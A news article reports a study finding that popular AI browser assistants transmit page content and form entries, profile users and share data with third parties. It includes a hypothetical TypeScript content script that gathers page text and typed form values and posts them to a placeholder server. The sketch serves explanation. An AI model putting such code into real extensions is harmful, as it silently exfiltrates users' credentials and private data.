A new academic study has revealed that popular AI browser extensions are collecting and sharing sensitive user data, including medical records, financial details, and browsing activity, without sufficient safeguards in place. The findings raise serious concerns over privacy in the growing field of AI-powered web assistants.
Researchers from University College London and the Mediterranea University of Reggio Calabria conducted the first large-scale analysis of generative AI browser assistants, focusing on how these tools handle user data. Their results show extensive tracking and profiling occurring in the background of everyday online activity.
While these extensions offer valuable features such as content summarization, question answering, and web navigation, the study found that many of them quietly transmit full page content to external servers. In some cases they even captured what users typed into forms, including banking credentials and health information.
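To make the finding concrete, the sketch below shows what "transmitting full page content" can look like inside a browser extension's content script. It is a hypothetical illustration written in TypeScript, not code from the study or from any of the extensions named here, and the `ASSISTANT_BACKEND` endpoint is an invented placeholder.

```typescript
// Hypothetical content-script sketch of the data flow the researchers describe.
// Assumed placeholder endpoint; no real assistant's API is shown here.
const ASSISTANT_BACKEND = "https://api.example-assistant.invalid/context";

function collectPageContext(): Record<string, unknown> {
  // The visible page text the assistant would later "summarize".
  const pageText = document.body.innerText;

  // Whatever the user has typed into form fields, which on sensitive sites
  // may include credentials or health details.
  const formValues = Array.from(
    document.querySelectorAll<HTMLInputElement>("input, textarea")
  ).map((el) => ({ name: el.name, value: el.value }));

  return { url: location.href, pageText, formValues };
}

// Ship the bundled context to a remote server; nothing in this flow checks
// whether the current page is a banking portal or a medical record.
fetch(ASSISTANT_BACKEND, {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify(collectPageContext()),
});
```

A pattern like this is invisible to the user: the extension runs in the context of every page visited, so the transfer happens silently in the background.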
For their research, the team created a simulated user profile—described as a “rich millennial male from southern California who is interested in equestrian activities”—and engaged with several AI assistants while performing common web tasks. Tools analyzed included ChatGPT for Google, Copilot, Merlin, Sider, Monica, TinaMind, and Perplexity.
Most assistants shared user data with third parties or used it to build user profiles, sometimes inferring attributes like age, income, and interests. These profiles were used to personalize responses, even across different sessions. Notably, only Perplexity showed no signs of profiling or third-party data sharing.
Some tools continued collecting information even when users visited private spaces such as health portals and government websites, violating expected privacy norms.
The research focused on U.S. usage, but experts believe many of these practices would likely fall foul of stricter privacy frameworks such as Europe's GDPR.
Researchers are now urging greater transparency and tighter regulation to ensure users understand what data is being collected, and to prevent invasive tracking by tools designed to assist rather than monitor.